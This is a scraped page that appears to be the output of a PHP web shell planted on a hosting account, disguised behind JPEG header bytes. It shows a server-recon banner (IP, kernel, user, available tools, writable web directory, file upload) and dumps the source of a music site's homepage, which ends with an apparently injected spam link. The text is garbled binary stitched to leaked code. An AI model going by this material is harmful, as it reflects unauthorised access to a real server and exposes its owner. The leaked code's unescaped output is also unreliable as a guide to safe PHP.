����JFIF��H�H����Exif��MM�*���� ��3����V�����3������3�(��������������������3�����
Server IP : 162.0.232.25 / Your IP : 3.144.89.0 Web Server : LiteSpeed System : Linux premium276.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : kwacuqig ( 988) PHP Version : 8.2.26 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/kwacuqig/public_html/ |
Upload File : |
<?php session_start(); ?> <!DOCTYPE html> <html> <head> <title>HOME</title> <meta charset="utf-8"> <link rel="stylesheet" type="text/css" href="style.css"> <link rel="stylesheet" type="text/css" href="css/font/flaticon.css"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link rel="stylesheet" href="css/fontawesome/css/all.css"> <link rel="icon" href="sun.ico"> </head> <style type="text/css"> .buttons{ width:98%; margin:2px 2px;} .buttons button{width:38%; padding:2px; margin:1px 4.8%;font-size:12px;} .buttons a.link, .buttons a.visited{text-decoration:none;} @media screen and (max-width: 720px) { .buttons{ width:110%; margin:2% -4.7%; } .buttons button{width:37%; padding:1.8px; margin:1% 5.5%;font-size:11px;} } @media screen and (max-width: 600px) { .buttons{ width:110%; margin:2% -5%; } .buttons button{width:36%; padding:1.8px; margin:1% 5.5%;font-size:10px;} } @media screen and (max-width: 400px) { .buttons{ width:120%; margin:2% -5.6%;} .buttons button{width:34%; padding:2px; margin:1% 5.5%;font-size:9px;} } @media screen and (max-width: 370px) { .buttons{ width:120%; margin:2% -6%;} .buttons button{width:34%; padding:2px; margin:1% 5.5%;font-size:8px;} } </style> <body > <div class="body1"> <div class="header"> <img src="kwacha.png" alt="KwachaMusic"> </div> <?php include 'navigation.php'; ?> <script> function click() { document.querySelector(".links").style.display="block"; } </script> <?php require 'connect.php'; $sql = "SELECT * FROM `music` WHERE `homepage`='home' ORDER BY `id` DESC LIMIT 12"; if($run = mysqli_query($con, $sql)){ $row = mysqli_num_rows($run); while($name=mysqli_fetch_array($run)){ $id=$name['id']; $image=$name['image']; $title=$name['title']; $artist=$name['artist']; $timestamp=$name['time']; $time = strtotime($timestamp); date_default_timezone_set('UTC'); $current_time = time(); $difference = $current_time - $time; $seconds = $difference; $days = round($seconds / 86400); ?> <div class= "box"> <div class = "column"> <div class="w3-display-container "> <img src="singles/artworks/<?php echo $image;?>" alt="<?php echo $title;?>"> </div> <div class="des"> <p style="color: white;"><?php $len = strlen($artist); $len2 = strlen($title); $str = substr($artist,0,13); $str2 = substr($title,0,12); if($len >= 13) { echo $str . "..."; } else { echo $artist; } echo " - "; if($len2 >= 12) { echo $str2 . "..."; } else { echo $title; } ?> </p> </div> <div class = "buttons"> <a href="homefiles/download3.php?id=<?php echo $id;?>"><button>DOWNLOAD</button></a> <a href="homefiles/stream.php?id=<?php echo $id;?>"><button>STREAM</button></a> </div> </div> </div> <?php } } else { die(mysqli_error($con)); } ?> <div class="footer"> �kwachaMusic 2021 - 2022 </div> <center><p><a href="https://bestmouseclicker.com/"><img src="https://i.imgur.com/reTSPKR.png" width="800" height="100" alt="Auto Clicker for Roblox"></a></p></center> </div> </body> </html>